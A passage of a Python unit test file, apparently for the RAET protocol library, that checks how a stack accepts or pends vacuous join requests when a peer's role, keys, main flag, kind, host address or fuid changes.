betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Accept and dump the remote role to achieve the following:
# Status: Accepted
# Role: Old
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Old
# Keys: New
beta.local.signer = nacling.Signer()
beta.local.priver = nacling.Privateer()
beta.dumpLocalRole()
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.verfer.keyhex, beta.local.signer.verhex)
self.assertEqual(alphaRemote.pubber.keyhex, beta.local.priver.pubhex)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewRole(self):
'''
Test joinent accept vacuous join with an updated role (D6)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
beta.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure old remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Ensure alpha knows nothing about the new remote role
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, None)
self.assertTrue(alpha.mutable)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptSameAll(self):
'''
Test joinent accept vacuous non-ephemeral join with same all values (E1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Either (use No)
self.assertIs(alpha.mutable, None)
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Set to most strict auto mode
alpha.keep.auto = raeting.AutoMode.never.value
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Computed
# Fuid: Old
# Leid: 0
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, No Change
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousEphemeralAcceptSameall(self):
'''
Test joinent accept vacuous ephemeral join from already accepted estate with same all (E2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousEphemeralAcceptSameall.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
alpha.removeRemote(alpha.remotes.values()[0])
beta.removeRemote(beta.remotes.values()[0])
# Mutable: Either (use No as most strict)
self.assertIs(alpha.mutable, None)
# AutoMode: Any (use Never as most strict)
alpha.keep.auto = raeting.AutoMode.never.value
# Ensure the next join would be ephemeral
self.assertIs(len(alpha.remotes), 0)
self.assertIs(len(alpha.nameRemotes), 0)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Body
# Main: Body
# Kind: Body
# RHA: Header
# Nuid: Computed
# Fuid: Header
# Leid: 0
# Reid: Header
# Role: Body
# Keys: Body
# Sameness: sameAll
alpha.clearStats()
beta.clearStats()
# Join
self.join(beta, alpha)
# Action: Accept, Add, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIn('join_correspond_complete', alpha.stats.keys())
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats.keys())
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alpha.remotes.values()[0], remoteData))
# Check role/keys dumped
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewMain(self):
'''
Test joinent pend and dump vacuous join with an updated main from pending remote (F1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewMain.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
oldMain = None
newMain = True
# Name: Old
# Main: New
self.assertIs(beta.main, oldMain)
beta.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Join with new main
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertIs(alphaRemote.main, newMain)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump of pended data
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['main'], beta.main) # new main value
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewKind(self):
'''
Test mutable joinent pend vacuous join with an updated kind (F2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewKind.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
oldKind = None
newKind = 33
# Name: Old
# Main: Either
# Kind: New
self.assertIs(beta.kind, oldKind)
beta.kind = newKind
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Join with new kind
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.kind, newKind)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['kind'], beta.kind) # new main value
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewRha(self):
'''
Test mutable joinent pend vacuous join with an updated remote host address (F3)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewRha.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
# beta connects with ha=('127.0.0.1', 7531)
oldHa = (beta.local.ha[0], 7532)
newHa = (beta.local.ha[0], beta.local.ha[1])
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=oldHa,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Appl: Either
# RHA: New: alpha remote ha is set to (127.0.0.1, 7532)
# new ha received from beta is (127.0.0.1, 7531)
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(alphaRemote.ha, oldHa)
self.assertEqual(beta.local.ha, newHa)
keep = self.copyData(alphaRemote)
# Join with updated Ha
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.ha, newHa)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(tuple(remoteData['ha']), beta.local.ha) # new value
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewFuid(self):
'''
Test mutable joinent pend vacuous join with an updated fuid (F4)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewFuid.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Simulate: alpha already know beta with fuid=33
# beta connects with a new fuid=newFuid
oldFuid = 33
newFuid = betaRemote.nuid
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=oldFuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Comuted
# Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
# Leid: 0
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.fuid, newFuid)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendNewRole(self):
'''
Test mutable joinent pend vacuous join with an updated role (F5)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendNewRole.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
